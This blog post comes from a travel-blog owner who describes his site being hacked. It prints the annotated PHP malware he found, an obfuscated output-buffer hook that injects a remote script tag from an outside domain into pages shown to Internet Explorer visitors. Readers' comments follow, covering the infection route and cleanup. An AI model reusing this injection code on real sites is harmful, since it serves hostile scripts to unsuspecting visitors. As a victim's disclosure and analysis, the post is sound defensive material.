How embarassing!

Well, it appears that some nasty spammer managed to add some JavaScript to the footer of this Blog, and so if you’ve accessed it recently using Internet Explorer you should make sure your anti-virus is up to date.

I’m still looking into what happened, and since we’re about to go offline for a week, I’ve temporarily hobbled the blog slightly to prevent the spam from showing. This means that some pages might not work quite as expected ( eg the where are we map). We’re still here and normal service will be resumed in a bit.

We’re very sorry for the inconvenience; we have no desire to have any advertising or whatnot pop up while you’re gracing us with your time!

Many thanks to Laura’s Dad for pointing this out, hopefully it won’t happen again

Update, September 22nd

So it turns out my hobbling above still didn’t fix the problem. I’ve finally cleared things out and all should now be fine. If anyone’s interested, it looks like we were hit by a variant of this: http://sucuri.net/malware/malware-entry-mwmrobh2

I’m still unclear on the infection route, but think it probably happened due to brute force guessing of our admin password, which has now been changed, along with everything else.

The problem code inserted a base64 encoded string to be evaluated in each php file, which evaluates as the following (comments added by me).

if(function_exists('ob_start')&&!isset($GLOBALS['mr_no']))
{
  $GLOBALS['mr_no']=1;   
  if(!function_exists('mrobh')){      
    if(!function_exists('gml')){    
      function gml(){      
        if (stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 6")
           ||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 7")
           ||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 8")
           ||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 9")){       
        return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9zd2VlcHN0YWtlc2FuZGNvbnRlc3Rzbm93LmNvbS9ubC5waHA/bm5uPTEiPjwvc2NyaXB0Pg==");      
            }      return "";     
        }
        // That <script src="http://sweepstakesandcontestsnow.com/nl.php?nnn=1"></script>  
        // which is the suspect javascript
    }        

// This then sets the output buffer to rewrite each page and drop the above script just before
// the </body> tag. Cunning, especially with the gzdecode stuff.
if(!function_exists('gzdecode')){     
  function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){      $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));      $RBE4C4D037E939226F65812885A53DAD9=10;      $RA3D52E52A48936CDE0F5356BB08652F2=0;      if($R30B2AB8DC1496D06B230A71D8962AF5D&4){       $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));       $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];       $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&8){       $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&16){       $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&2){       $RBE4C4D037E939226F65812885A53DAD9+=2;      }      $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));      if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){       $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;      }      return $R034AE2AB94F99CC81B389A1822DA3353;     }    }    function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){     Header('Content-Encoding: none');     $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);       if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){      return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);     }else{      return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();     }    }    ob_start('mrobh');   }  }

(Ah, that brings back some memories of Slang from GS… Dynamic function definitions, oh yes)

Anyway, all should be good now. Hopefully we don’t get hacked again tonight!

Simon

5 thoughts on “How embarassing!

  1. Pingback: Live to Try » I got pwned, did you?

  2. We had ~20 html files modified on Sept 21 between 1252-1253 PST with the script injected at the beginning of each file. I agree that main admin password must have been cracked. There were two variants injected (URL modified):

    \n

    \nXSym
    0010
    eacf331f0ffc35d4b482f1d15a887d3b

    • Are you also hosted on dreamhost? It seems there was a mass defacement on accounts hosted by them at the same time. I have a feeling it was from another DH account, which was able to write to other directories that were world writable (which I think is default for a DH wordpress autoinstall). Worth tightening all directory permissions, and setting file sharing to ‘private’ in the control panel – by default they can be read by other users on the same server.

  3. How did you clear things out Simon..? I’ve got the same problem… I haven’t found that 64 bit code but I’ve got the same

    error coming up in Google webmaster tools … I’m about do delete my entire blog from the site.
    BTW… great photos and trip blog…

    • I just manually removed the offending code from settings.php – the link I included above should have some removal instructions that work.

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>